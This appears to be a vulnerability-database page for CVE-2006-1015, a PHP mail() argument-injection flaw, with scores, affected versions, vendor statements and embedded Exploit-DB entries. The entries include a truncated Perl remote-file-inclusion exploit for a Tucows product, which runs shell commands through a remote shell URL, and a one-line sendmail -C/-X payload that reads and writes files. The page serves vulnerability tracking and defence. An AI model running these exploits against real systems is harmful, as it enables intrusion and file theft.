CVE-2006-1015
published 2006-03-07CVE-2006-1015: Argument injection vulnerability in certain PHP 3.x, 4.x, and 5.x applications, when used with sendmail and when accepting remote input for the…
PriorityP338medium6.4CVSS 2.0
AVNACLAuNCPIPAN
EXPLOIT
EPSS
11.08%
95.4th percentile
Argument injection vulnerability in certain PHP 3.x, 4.x, and 5.x applications, when used with sendmail and when accepting remote input for the additional_parameters argument to the mail function, allows remote attackers to read and create arbitrary files via the sendmail -C and -X arguments. NOTE: it could be argued that this is a class of technology-specific vulnerability, instead of a particular instance; if so, then this should not be included in CVE.
Affected
60 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
| php | php | — | — |
CVSS provenance
nvdv2.06.4MEDIUMAV:N/AC:L/Au:N/C:P/I:P/A:N
vendor_redhat6.4MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-pjvh-w3q2-44j5: Argument injection vulnerability in certain PHP 3
ghsa_unreviewed·2022-05-01
CVE-2006-1015 [MEDIUM] GHSA-pjvh-w3q2-44j5: Argument injection vulnerability in certain PHP 3
Argument injection vulnerability in certain PHP 3.x, 4.x, and 5.x applications, when used with sendmail and when accepting remote input for the additional_parameters argument to the mail function, allows remote attackers to read and create arbitrary files via the sendmail -C and -X arguments. NOTE: it could be argued that this is a class of technology-specific vulnerability, instead of a particular instance; if so, then this should not be included in CVE.
Red Hat
CVE-2006-1015: Argument injection vulnerability in certain PHP 3
vendor_redhat·CVSS 6.4
CVE-2006-1015 [MEDIUM] CVE-2006-1015: Argument injection vulnerability in certain PHP 3
Argument injection vulnerability in certain PHP 3.x, 4.x, and 5.x applications, when used with sendmail and when accepting remote input for the additional_parameters argument to the mail function, allows remote attackers to read and create arbitrary files via the sendmail -C and -X arguments. NOTE: it could be argued that this is a class of technology-specific vulnerability, instead of a particular instance; if so, then this should not be included in CVE.
Statement: We do not consider these to be security issues:
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=169857#c1
No detection rules found.
Exploit-DB
Tucows Client Code Suite (CSS) 1.2.1015 - Remote File Inclusion
exploitdb·2006-12-08
CVE-2006-6551 Tucows Client Code Suite (CSS) 1.2.1015 - Remote File Inclusion
Tucows Client Code Suite (CSS) 1.2.1015 - Remote File Inclusion
---
#!/usr/bin/perl
#Tucows Open Project --Remote File Inclusion Vulnerablity
#Bug Found & Exploit [c]oded By Dr Max Virus
#Download:http://developer.tucows.com/code/ccs/downloads/ccs-open-1.2.1015-2006-209-1337.zip
use LWP::UserAgent;
$target=@ARGV[0];
$shellsite=@ARGV[1];
$cmdv=@ARGV[2];
if($target!~/http:\/\// || $shellsite!~/http:\/\// || !$cmdv)
{
usg()
}
header();
while()
{
print "[Shell] \$";
while ()
{
$cmd=$_;
chomp($cmd);
$xpl = LWP::UserAgent->new() or die;
$req =
HTTP::Request->new(GET=>$target.'/libs/tucows/api/cartridges/crt_TUCOWS_domains/lib/domainutils.inc.php?_ENV[TCA_HOME]='.$shellsite='.?&'.$cmdv.'='.$cmd)or
die "\n\n Failed to Connect, Try again!\n";
$res = $xpl->request($req);
$info = $res->conte
Exploit-DB
PHP 4.x/5.0/5.1 with Sendmail Mail Function - 'additional_param' Arbitrary File Creation
exploitdb·2006-02-28
CVE-2006-1015 PHP 4.x/5.0/5.1 with Sendmail Mail Function - 'additional_param' Arbitrary File Creation
PHP 4.x/5.0/5.1 with Sendmail Mail Function - 'additional_param' Arbitrary File Creation
---
source: https://www.securityfocus.com/bid/16878/info
PHP is prone to multiple input-validation vulnerabilities that could allow 'safe_mode' and 'open_basedir' security settings to be bypassed. These issues reside in the 'mb_send_mail()' function, the 'mail()' function, and various PHP IMAP functions.
$additional_param = "-C ".$file_to_read." -X ".getcwd()."/".$output_file;
No writeups or analysis indexed.
http://secunia.com/advisories/19979http://securityreason.com/securityalert/517http://www.novell.com/linux/security/advisories/05-05-2006.htmlhttp://www.securityfocus.com/archive/1/426497/100/0/threadedhttp://www.securityfocus.com/bid/16878http://secunia.com/advisories/19979http://securityreason.com/securityalert/517http://www.novell.com/linux/security/advisories/05-05-2006.htmlhttp://www.securityfocus.com/archive/1/426497/100/0/threadedhttp://www.securityfocus.com/bid/16878
2006-03-07
Published